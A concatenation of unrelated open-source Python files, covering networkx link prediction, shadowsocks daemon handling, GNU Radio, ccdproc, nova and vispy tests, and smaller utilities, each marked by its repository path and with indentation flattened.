pixels: The flat array of pixels in the form of [r,g,b[,a],r,g,b[,a],...]
bpp: 3 for RGB, 4 for RGBA."""
return impl.FromRGBPixels(width, height, pixels, bpp)
def FromPng(png_data):
"""Create an image from raw PNG data."""
return impl.FromPng(png_data)
def FromPngFile(path):
"""Create an image from a PNG file.
Args:
path: The path to the PNG file."""
return impl.FromPngFile(path)
def FromBase64Png(base64_png):
"""Create an image from raw PNG data encoded in base64."""
return FromPng(base64.b64decode(base64_png))
def AreEqual(image1, image2, tolerance=0, likely_equal=True):
"""Determines whether two images are identical within a given tolerance.
Setting likely_equal to False enables short-circuit equality testing, which
is about 2-3x slower for equal images, but can be image height times faster
if the images are not equal."""
return impl.AreEqual(image1, image2, tolerance, likely_equal)
def Diff(image1, image2):
"""Returns a new image that represents the difference between this image
and another image."""
return impl.Diff(image1, image2)
def GetBoundingBox(image, color, tolerance=0):
"""Finds the minimum box surrounding all occurrences of bgr |color|.
Ignores the alpha channel.
Args:
color: RgbaColor, bounding box color.
tolerance: int, per-channel tolerance for the bounding box color.
Returns:
(top, left, width, height), match_count"""
return impl.GetBoundingBox(image, color, tolerance)
def Crop(image, left, top, width, height):
"""Crops the current image down to the specified box."""
return impl.Crop(image, left, top, width, height)
def GetColorHistogram(image, ignore_color=None, tolerance=0):
"""Computes a histogram of the pixel colors in this image.
Args:
ignore_color: An RgbaColor to exclude from the bucket counts.
tolerance: A tolerance for the ignore_color.
Returns:
A ColorHistogram namedtuple with 256 integers in each field: r, g, and b."""
return impl.GetColorHistogram(image, ignore_color, tolerance)
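# Usage sketch (file names are hypothetical; uses only functions defined in
# this module):
#
#     img = FromPngFile('screenshot.png')
#     half = Crop(img, 0, 0, Width(img) // 2, Height(img) // 2)
#     WritePngFile(half, 'top_left.png')
#     assert AreEqual(half, FromPngFile('top_left.png'), tolerance=0)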
|
sbuss/voteswap
|
refs/heads/master
|
lib/networkx/algorithms/link_prediction.py
|
40
|
"""
Link prediction algorithms.
"""
from __future__ import division
import math
import networkx as nx
from networkx.utils.decorators import *
__all__ = ['resource_allocation_index',
'jaccard_coefficient',
'adamic_adar_index',
'preferential_attachment',
'cn_soundarajan_hopcroft',
'ra_index_soundarajan_hopcroft',
'within_inter_cluster']
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def resource_allocation_index(G, ebunch=None):
r"""Compute the resource allocation index of all node pairs in ebunch.
Resource allocation index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{|\Gamma(w)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Resource allocation index will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their resource allocation index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.resource_allocation_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.75000000'
'(2, 3) -> 0.75000000'
References
----------
.. [1] T. Zhou, L. Lu, Y.-C. Zhang.
Predicting missing links via local information.
Eur. Phys. J. B 71 (2009) 623.
http://arxiv.org/pdf/0901.0553.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
return sum(1 / G.degree(w) for w in nx.common_neighbors(G, u, v))
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def jaccard_coefficient(G, ebunch=None):
r"""Compute the Jaccard coefficient of all node pairs in ebunch.
Jaccard coefficient of nodes `u` and `v` is defined as
.. math::
\frac{|\Gamma(u) \cap \Gamma(v)|}{|\Gamma(u) \cup \Gamma(v)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Jaccard coefficient will be computed for each pair of nodes
given in the iterable. The pairs must be given as 2-tuples
(u, v) where u and v are nodes in the graph. If ebunch is None
then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Jaccard coefficient.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.jaccard_coefficient(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.60000000'
'(2, 3) -> 0.60000000'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
cnbors = list(nx.common_neighbors(G, u, v))
union_size = len(set(G[u]) | set(G[v]))
if union_size == 0:
return 0
else:
return len(cnbors) / union_size
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def adamic_adar_index(G, ebunch=None):
r"""Compute the Adamic-Adar index of all node pairs in ebunch.
Adamic-Adar index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{\log |\Gamma(w)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Adamic-Adar index will be computed for each pair of nodes given
in the iterable. The pairs must be given as 2-tuples (u, v)
where u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Adamic-Adar index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.adamic_adar_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 2.16404256'
'(2, 3) -> 2.16404256'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
return sum(1 / math.log(G.degree(w))
for w in nx.common_neighbors(G, u, v))
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def preferential_attachment(G, ebunch=None):
r"""Compute the preferential attachment score of all node pairs in ebunch.
Preferential attachment score of `u` and `v` is defined as
.. math::
|\Gamma(u)| |\Gamma(v)|
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Preferential attachment score will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their preferential attachment score.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.preferential_attachment(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 1) -> 16'
'(2, 3) -> 16'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
return ((u, v, G.degree(u) * G.degree(v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cn_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Count the number of common neighbors of all node pairs in ebunch
using community information.
For two nodes `u` and `v`, this function computes the number of
common neighbors and adds a bonus of one for each common neighbor
belonging to the same community as `u` and `v`. Mathematically,
.. math::
|\Gamma(u) \cap \Gamma(v)| + \sum_{w \in \Gamma(u) \cap \Gamma(v)} f(w)
where `f(w)` equals 1 if `w` belongs to the same community as `u`
and `v` or 0 otherwise and :math:`\Gamma(u)` denotes the set of
neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G.node[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.path_graph(3)
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 0
>>> G.node[2]['community'] = 0
>>> preds = nx.cn_soundarajan_hopcroft(G, [(0, 2)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 2) -> 2'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
cnbors = list(nx.common_neighbors(G, u, v))
if Cu == Cv:
return len(cnbors) + sum(_community(G, w, community) == Cu
for w in cnbors)
else:
return len(cnbors)
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def ra_index_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Compute the resource allocation index of all node pairs in
ebunch using community information.
For two nodes `u` and `v`, this function computes the resource
allocation index considering only common neighbors belonging to the
same community as `u` and `v`. Mathematically,
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{f(w)}{|\Gamma(w)|}
where `f(w)` equals 1 if `w` belongs to the same community as `u`
and `v` or 0 otherwise and :math:`\Gamma(u)` denotes the set of
neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G.node[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 0
>>> G.node[2]['community'] = 1
>>> G.node[3]['community'] = 0
>>> preds = nx.ra_index_soundarajan_hopcroft(G, [(0, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 3) -> 0.50000000'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu == Cv:
cnbors = nx.common_neighbors(G, u, v)
return sum(1 / G.degree(w) for w in cnbors
if _community(G, w, community) == Cu)
else:
return 0
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def within_inter_cluster(G, ebunch=None, delta=0.001, community='community'):
"""Compute the ratio of within- and inter-cluster common neighbors
of all node pairs in ebunch.
For two nodes `u` and `v`, if a common neighbor `w` belongs to the
same community as them, `w` is considered a within-cluster common
neighbor of `u` and `v`. Otherwise, it is considered an
inter-cluster common neighbor of `u` and `v`. The ratio between the
size of the set of within- and inter-cluster common neighbors is
defined as the WIC measure. [1]_
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The WIC measure will be computed for each pair of nodes given in
the iterable. The pairs must be given as 2-tuples (u, v) where
u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
delta : float, optional (default = 0.001)
Value to prevent division by zero in case there is no
inter-cluster common neighbor between two nodes. See [1]_ for
details. Default value: 0.001.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G.node[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their WIC measure.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (0, 3), (1, 4), (2, 4), (3, 4)])
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 1
>>> G.node[2]['community'] = 0
>>> G.node[3]['community'] = 0
>>> G.node[4]['community'] = 0
>>> preds = nx.within_inter_cluster(G, [(0, 4)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.99800200'
>>> preds = nx.within_inter_cluster(G, [(0, 4)], delta=0.5)
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.33333333'
References
----------
.. [1] Jorge Carlos Valverde-Rebaza and Alneu de Andrade Lopes.
Link prediction in complex networks based on cluster information.
In Proceedings of the 21st Brazilian conference on Advances in
Artificial Intelligence (SBIA'12)
http://dx.doi.org/10.1007/978-3-642-34459-6_10
"""
if delta <= 0:
raise nx.NetworkXAlgorithmError('Delta must be greater than zero')
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu == Cv:
cnbors = set(nx.common_neighbors(G, u, v))
within = set(w for w in cnbors
if _community(G, w, community) == Cu)
inter = cnbors - within
return len(within) / (len(inter) + delta)
else:
return 0
return ((u, v, predict(u, v)) for u, v in ebunch)
def _community(G, u, community):
"""Get the community of the given node."""
node_u = G.node[u]
try:
return node_u[community]
except KeyError:
raise nx.NetworkXAlgorithmError('No community information')
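# Worked example (derived from the within_inter_cluster doctest above): for
# the graph with edges (0, 1), (0, 2), (0, 3), (1, 4), (2, 4), (3, 4) and
# communities {0: 0, 1: 1, 2: 0, 3: 0, 4: 0}, the common neighbors of 0 and 4
# are {1, 2, 3}. Nodes 2 and 3 share community 0 with both endpoints
# (within = 2) while node 1 does not (inter = 1), so the WIC measure is
# 2 / (1 + 0.001) ~= 1.998002, and 2 / (1 + 0.5) ~= 1.333333 with delta=0.5.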
|
Ritsyy/fjord
|
refs/heads/master
|
fjord/base/validators.py
|
7
|
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from fjord.base.utils import is_url
class EnhancedURLValidator(URLValidator):
"""URLValidator that also validates about: and chrome:// urls"""
def __call__(self, value):
# is_url turns around and uses URLValidator regex, so this
# covers everything URLValidator covers plus some other
# things.
if not is_url(value):
raise ValidationError(self.message, code=self.code)
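# Usage sketch (inputs are illustrative): is_url() is expected to accept
# about: and chrome:// schemes in addition to everything URLValidator allows,
# so only clearly malformed values should raise.
#
#     validator = EnhancedURLValidator()
#     validator('https://example.com/')   # no exception
#     validator('about:config')           # no exception expected
#     validator('not a url')              # raises ValidationError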
|
tyc85/nwsdr-3.6.3-dsc
|
refs/heads/master
|
gr-analog/python/qa_dpll.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import analog_swig as analog
import math
class test_dpll_bb(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_dpll_bb_001(self):
# Test set/gets
period = 1.0
gain = 0.1
op = analog.dpll_bb(period, gain)
op.set_gain(0.2)
g = op.gain()
self.assertAlmostEqual(g, 0.2)
f = op.freq()
self.assertEqual(1/period, f)
d0 = 1.0 - 0.5*f
d1 = op.decision_threshold()
self.assertAlmostEqual(d0, d1)
p = op.phase()
self.assertEqual(0, p)
def test_dpll_bb_002(self):
period = 4
gain = 0.1
src_data = 10*((period-1)*[0,] + [1,])
expected_result = src_data
src = gr.vector_source_b(src_data)
op = analog.dpll_bb(period, gain)
dst = gr.vector_sink_b()
self.tb.connect(src, op)
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertComplexTuplesAlmostEqual(expected_result, result_data, 4)
if __name__ == '__main__':
gr_unittest.run(test_dpll_bb, "test_dpll_bb.xml")
|
crawfordsm/ccdproc
|
refs/heads/placeholder
|
ccdproc/tests/test_gain.py
|
5
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module implements the base CCDData class.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from numpy.testing import assert_array_equal
from astropy.tests.helper import pytest
from astropy.units.quantity import Quantity
import astropy.units as u
from ..core import *
# tests for gain
@pytest.mark.parametrize('gain', [
3.0,
3.0 * u.photon / u.adu,
3.0 * u.electron / u.adu,
Keyword('gainval', unit=u.electron / u.adu)])
@pytest.mark.data_unit(u.adu)
def test_linear_gain_correct(ccd_data, gain):
ccd_data = create_deviation(ccd_data, readnoise=1.0 * u.adu)
ccd_data.meta['gainval'] = 3.0
orig_data = ccd_data.data
ccd = gain_correct(ccd_data, gain)
if isinstance(gain, Keyword):
gain = gain.value # convert to Quantity...
try:
gain_value = gain.value
except AttributeError:
gain_value = gain
assert_array_equal(ccd.data, gain_value * orig_data)
assert_array_equal(ccd.uncertainty.array,
gain_value * ccd_data.uncertainty.array)
if isinstance(gain, Quantity):
assert ccd.unit == ccd_data.unit * gain.unit
else:
assert ccd.unit == ccd_data.unit
# test gain with gain_unit
@pytest.mark.data_unit(u.adu)
def test_linear_gain_unit_keyword(ccd_data):
ccd_data = create_deviation(ccd_data, readnoise=1.0 * u.adu)
orig_data = ccd_data.data
gain = 3.0
gain_unit = u.electron / u.adu
ccd = gain_correct(ccd_data, gain, gain_unit=gain_unit)
assert_array_equal(ccd.data, gain * orig_data)
assert_array_equal(ccd.uncertainty.array,
gain * ccd_data.uncertainty.array)
assert ccd.unit == ccd_data.unit * gain_unit
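# Note (restating what the assertions above check): gain_correct multiplies
# both the data and the uncertainty by the gain, and when the gain carries a
# unit the result unit is the product, e.g. adu * (electron / adu) = electron,
# so data in adu corrected with a 3.0 electron/adu gain comes out in electrons.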
|
bjrara/shadowsocks
|
refs/heads/master
|
shadowsocks/daemon.py
|
386
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
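# Illustrative config (keys taken from daemon_exec above; paths are
# hypothetical):
#
#     daemon_exec({
#         'daemon': 'start',                        # or 'stop' / 'restart'
#         'pid-file': '/var/run/shadowsocks.pid',
#         'log-file': '/var/log/shadowsocks.log',
#     })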
|
openstack/nova
|
refs/heads/master
|
nova/tests/unit/objects/test_instance_info_cache.py
|
4
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.db import api as db
from nova import exception
from nova.network import model as network_model
from nova.objects import instance_info_cache
from nova.tests.unit.objects import test_objects
fake_info_cache = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': False,
'instance_uuid': uuids.info_instance,
'network_info': '[]',
}
class _TestInstanceInfoCacheObject(object):
@mock.patch.object(db, 'instance_info_cache_get')
def test_get_by_instance_uuid(self, mock_get):
nwinfo = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
mock_get.return_value = dict(fake_info_cache,
network_info=nwinfo.json())
obj = instance_info_cache.InstanceInfoCache.get_by_instance_uuid(
self.context, uuids.info_instance)
self.assertEqual(uuids.info_instance, obj.instance_uuid)
self.assertEqual(nwinfo, obj.network_info)
mock_get.assert_called_once_with(self.context, uuids.info_instance)
@mock.patch.object(db, 'instance_info_cache_get', return_value=None)
def test_get_by_instance_uuid_no_entries(self, mock_get):
self.assertRaises(
exception.InstanceInfoCacheNotFound,
instance_info_cache.InstanceInfoCache.get_by_instance_uuid,
self.context, uuids.info_instance)
mock_get.assert_called_once_with(self.context, uuids.info_instance)
def test_new(self):
obj = instance_info_cache.InstanceInfoCache.new(self.context,
uuids.info_instance)
self.assertEqual(set(['instance_uuid', 'network_info']),
obj.obj_what_changed())
self.assertEqual(uuids.info_instance, obj.instance_uuid)
self.assertIsNone(obj.network_info)
@mock.patch.object(db, 'instance_info_cache_update')
def test_save_updates_self(self, mock_update):
fake_updated_at = datetime.datetime(2015, 1, 1)
nwinfo = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
nwinfo_json = nwinfo.json()
new_info_cache = fake_info_cache.copy()
new_info_cache['id'] = 1
new_info_cache['updated_at'] = fake_updated_at
new_info_cache['network_info'] = nwinfo_json
mock_update.return_value = new_info_cache
obj = instance_info_cache.InstanceInfoCache(context=self.context)
obj.instance_uuid = uuids.info_instance
obj.network_info = nwinfo_json
obj.save()
mock_update.assert_called_once_with(self.context, uuids.info_instance,
{'network_info': nwinfo_json})
self.assertEqual(timeutils.normalize_time(fake_updated_at),
timeutils.normalize_time(obj.updated_at))
@mock.patch.object(db, 'instance_info_cache_get',
return_value=fake_info_cache)
def test_refresh(self, mock_get):
obj = instance_info_cache.InstanceInfoCache.new(self.context,
uuids.info_instance_1)
obj.refresh()
self.assertEqual(fake_info_cache['instance_uuid'], obj.instance_uuid)
mock_get.assert_called_once_with(self.context, uuids.info_instance_1)
class TestInstanceInfoCacheObject(test_objects._LocalTest,
_TestInstanceInfoCacheObject):
pass
class TestInstanceInfoCacheObjectRemote(test_objects._RemoteTest,
_TestInstanceInfoCacheObject):
pass
|
ghisvail/vispy
|
refs/heads/master
|
vispy/testing/_runners.py
|
7
|
# -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""Test running functions"""
from __future__ import print_function
import sys
import os
import warnings
from os import path as op
from copy import deepcopy
from functools import partial
from ..util import use_log_level, run_subprocess
from ..util.ptime import time
from ._testing import SkipTest, has_application, nottest
_line_sep = '-' * 70
def _get_import_dir():
import_dir = op.abspath(op.join(op.dirname(__file__), '..'))
up_dir = op.join(import_dir, '..')
if (op.isfile(op.join(up_dir, 'setup.py')) and
op.isdir(op.join(up_dir, 'vispy')) and
op.isdir(op.join(up_dir, 'examples'))):
dev = True
else:
dev = False
return import_dir, dev
_unit_script = """
try:
import pytest as tester
except ImportError:
import nose as tester
try:
import faulthandler
faulthandler.enable()
except Exception:
pass
raise SystemExit(tester.main(%r))
"""
def _unit(mode, extra_arg_string, coverage=False):
"""Run unit tests using a particular mode"""
import_dir = _get_import_dir()[0]
cwd = op.abspath(op.join(import_dir, '..'))
extra_args = [''] + extra_arg_string.split(' ')
del extra_arg_string
use_pytest = False
try:
import pytest # noqa, analysis:ignore
use_pytest = True
except ImportError:
try:
import nose # noqa, analysis:ignore
except ImportError:
raise SkipTest('Skipping unit tests, neither pytest nor nose '
'installed')
if mode == 'nobackend':
msg = 'Running tests with no backend'
if use_pytest:
extra_args += ['-m', '"not vispy_app_test"']
else:
extra_args += ['-a', '"!vispy_app_test"']
else:
# check to make sure we actually have the backend of interest
invalid = run_subprocess([sys.executable, '-c',
'import vispy.app; '
'vispy.app.use_app("%s"); exit(0)' % mode],
return_code=True)[2]
if invalid:
print('%s\n%s\n%s' % (_line_sep, 'Skipping backend %s, not '
'installed or working properly' % mode,
_line_sep))
raise SkipTest()
msg = 'Running tests with %s backend' % mode
if use_pytest:
extra_args += ['-m', 'vispy_app_test']
else:
extra_args += ['-a', 'vispy_app_test']
if coverage and use_pytest:
extra_args += ['--cov', 'vispy', '--no-cov-on-fail']
# make a call to "python" so that it inherits whatever the system
# thinks is "python" (e.g., virtualenvs)
extra_arg_string = ' '.join(extra_args)
insert = extra_arg_string if use_pytest else extra_args
extra_args += [import_dir] # positional argument
cmd = [sys.executable, '-c', _unit_script % insert]
env = deepcopy(os.environ)
# We want to set this for all app backends plus "nobackend" to
# help ensure that app tests are appropriately decorated
